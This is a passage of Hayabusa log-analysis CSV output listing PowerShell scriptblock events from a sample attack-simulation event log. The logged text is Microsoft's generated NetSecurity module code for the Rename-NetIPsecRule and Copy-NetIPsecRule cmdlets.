'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.754 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Rename-NetIPsecRule' function Copy-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')]",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.754 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 